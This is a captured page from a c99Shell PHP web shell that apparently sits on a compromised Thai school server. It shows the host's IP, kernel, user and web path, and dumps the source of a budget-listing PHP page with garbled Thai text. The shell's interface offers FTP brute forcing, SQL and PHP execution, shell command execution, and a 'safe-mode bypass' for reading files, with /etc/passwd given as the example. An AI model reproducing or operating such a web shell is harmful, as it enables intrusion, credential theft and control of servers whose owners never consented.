110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/teacher/ drwxr-xr-x Free 52.82 GB of 127.8 GB (41.33%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php

include("../link/function.php");

 include("../include/FunctionDB.php");

 include("../include/Function.php");

ConnectDB();



$strSQL = "SELECT * FROM    projectstdplan_tb   GROUP BY   Budget_Year  ";

if (! $Page)

$Page = 1;

$Pre_Page = $Page - 1;

$Next_Page = $Page +1;

$Per_Page = 50;

$result = mysql_query($strSQL);

$Page_start = ($Per_Page*$Page) - $Per_Page;

$Num_Rows = mysql_num_rows($result);

if( $Num_Rows <= $Per_Page)

   $Num_Pages = 1;

else if (($Num_Rows % $Per_Page) == 0)

       $Num_Pages = ($Num_Rows / $Per_Page);

else

        $Num_Pages = ($Num_Rows / $Per_Page) + 1;

$Num_Pages = (int)$Num_Pages;



if (( $Page > $Num_Pages) || ($Page < 0))

  echo"Page $Page More than $Num_Pages";

$strSQL .=" LIMIT $Page_start,$Per_Page" ;

$result = mysql_query($strSQL); 

$num = mysql_num_rows($result );

?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>

<title>ГТВЕРаНХВґв¤ЗµТ</title>

<meta http-equiv="Content-Type" content="text/html; charset=windows-874">

<link href="../source/style.css" rel="stylesheet" type="text/css">

<style type="text/css">

<!--

.style23 {font-size: 14px}

.style24 {color: #000000}

-->

</style>



<!---------------------------------------Begin JavaScript---------------------------------------->

<SCRIPT LANGUAGE="JavaScript" src="../source/script.js"></SCRIPT>

<script language="JavaScript">



    function ReturnValue(code,No_in)



    {

     //    if(id == 1){

            window.opener.document.form1.code.value = code;

            window.opener.document.form1.No_in.value = No_in;            

             window.close();        

        

        }

        /*

        if(id == 2){

            window.opener.document.pc.quotaId2.value = quotaId;

            window.opener.document.pc.provinceId2.value = provinceId;

        }

        if(id == 3){

            window.opener.document.pc.quotaId3.value = quotaId;

            window.opener.document.pc.provinceId3.value = provinceId;

        }

        if(id == 4){

            window.opener.document.pc.quotaId4.value = quotaId;

            window.opener.document.pc.provinceId4.value = provinceId;

        }

        if(id == 5){

            window.opener.document.pc.quotaId5.value = quotaId;

            window.opener.document.pc.provinceId5.value = provinceId;

        }

        if(id == 6){

            window.opener.document.pc.quotaId6.value = quotaId;

            window.opener.document.pc.provinceId6.value = provinceId;

        }

        if(id == 7){

            window.opener.document.pc.quotaId7.value = quotaId;

            window.opener.document.pc.provinceId7.value = provinceId;

        }

        if(id == 8){

            window.opener.document.pc.quotaId8.value = quotaId;

            window.opener.document.pc.provinceId8.value = provinceId;

        }

        if(id == 9){

            window.opener.document.pc.quotaId9.value = quotaId;

            window.opener.document.pc.provinceId9.value = provinceId;

        }

        if(id == 10){

            window.opener.document.pc.quotaId10.value = quotaId;

            window.opener.document.pc.provinceId10.value = provinceId;

        }

        if(id == 11){

            window.opener.document.pc.quotaId11.value = quotaId;

            window.opener.document.pc.provinceId11.value = provinceId;

        }

        if(id == 12){

            window.opener.document.pc.quotaId12.value = quotaId;

            window.opener.document.pc.provinceId12.value = provinceId;

        }

        window.opener.document.pc.No_in.value = No_in;

            window.opener.document.pc.provinceName.value = provinceName;

    if(id == 1 && window.opener.document.pc.countQuota.value == 1){

    window.opener.document.pc.quotaName.value = quotaTypeName;        

    window.opener.document.pc.provinceName.value = provinceName;

        }    

    if((id != 1 || id == 1) && window.opener.document.pc.countQuota.value != 1){

        window.opener.document.pc.quotaName[id-1].value = quotaTypeName;        

    window.opener.document.pc.provinceName[id-1].value = provinceName;

        }    

        window.close();                

    }

*/

</script>



</head>

<form name="pc" action="<?php echo $PHP_SELF?>" method="post">

  <div align="center">

    <table width="86%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" style="background-color:#eeeeee; border:0px solid gray">

      

      <tr bgcolor="#E6E6E6">        

        <td width="973" align="center" style="border:1px solid gray"><span class="style23"><font color="#000000" face="Tahoma">»Х§є»ГРБТі</font></span></td>

      </tr>

      <?php

$i = 1;

 while($row = mysql_fetch_array($result))

 {



     if($count==0)

     {

?>

      <tr bgcolor="#F7F7F7" >        

        <td align="left" bgcolor="#FFFFFF"><font face="Tahoma"><span class="style24">»Х§є»ГРБТі&nbsp;&nbsp;</span></font><font color="#996600" face="Tahoma"></span></font><font color="#996600" size="2" face="Tahoma"></a></a></font><font color="#996600" size="2" face="Tahoma"><a href="PlanCodeDetail.php?Budget_Year=<?=$row["Budget_Year"] ?>&Flag=Y "title="Click to see Detail" class="d" >

         <?=$row["Budget_Year"]?>

        </a></font></td>

      </tr>

      <?

    $count=1;

     }

else

{

?>

      <tr bgcolor="#FFFFFF">        

      <td bgcolor="#ECF5FF"><font face="Tahoma"><span class="style24">»Х§є»ГРБТі&nbsp;&nbsp;</span></font><font color="#996600" face="Tahoma"></span></font><font color="#996600" size="2" face="Tahoma"></a></a></font> <font color="#996600" size="2" face="Tahoma"><a href="PlanCodeDetail.php?Budget_Year=<?=$row["Budget_Year"] ?>&Flag=Y "title="Click to see Detail" class="d" >

      <?=$row["Budget_Year"]?>

        </a></font></td>

      </tr>

      <?

$count=0;

}

$i++;

 }    

?>            

      <tr bgcolor="#CCCCFF">

        <td height="25" align="center" bgcolor="#FFFFFF" ><div align="center"><strong><font color="#000000" size="2" face="Tahoma">·Сй§ЛБґ</font><font color="#003399" size="2" face="Tahoma"> <? echo $num ?> </font><font color="#003366" size="2" face="Tahoma"> »Х </font></strong></div></td>

         <tr>

           <td height="24" align="center"><div align="center"><font color="#FFFFFF"> <font color="#FFFFFF" size="3" face="MS Sans Serif"><strong> <font color="#0033CC"><font color="#FFFFFF"><font color="#FFFFFF" size="3" face="MS Sans Serif"><strong><font color="#0033CC" size="2" face="Tahoma"><?php echo $Num_Pages;?></font></strong></font></font><font size="2" face="Tahoma">&nbsp;</font></font></strong></font><font color="#000000" size="2" face="Tahoma"><strong> Л№йТ</strong></font> <font color="#0033CC" size="1" face="Tah<?php echo $Num_Pages;?>oma"><strong>

          <?php

if ($Pre_Page)

   echo"<a href=\"$PHP_SELF?Page=$Pre_Page&Year=$Year&Teacher_code=$Teacher_code\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b>&lt;&lt; Previus</b> </font></a>";



   for($i=1;$i<=$Num_Pages;$i++)

   {

    if($i != $Page)

         echo" [<a href=\"$PHP_SELF?Page=$i&Year=$Year&Teacher_code=$Teacher_code\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b>$i</b></font></a>] ";

    else

        echo"<b>$i</b>";

   }

if($Page != $Num_Pages)

 echo"<a href=\"$PHP_SELF?Page=$Next_Page&Year=$Year&Teacher_code=$Teacher_code\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b> Next &gt;&gt;</b> </font></a>";

 ?>

        </strong></font> </font>

               <input name="code" type="hidden" id="code" value="<? echo $rs["code"]?>">

           </div></td>

      </tr>

         

         <tr>

           <td align="center"><a href="#" onClick="window.close()"><font face="Microsoft Sans Serif" size="1">[»ФґЛ№йТ№Хй]</font></a></td>

         </tr>

      <tr>

      <td height="2">      </tr>

    </table>

  </div>

</form>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: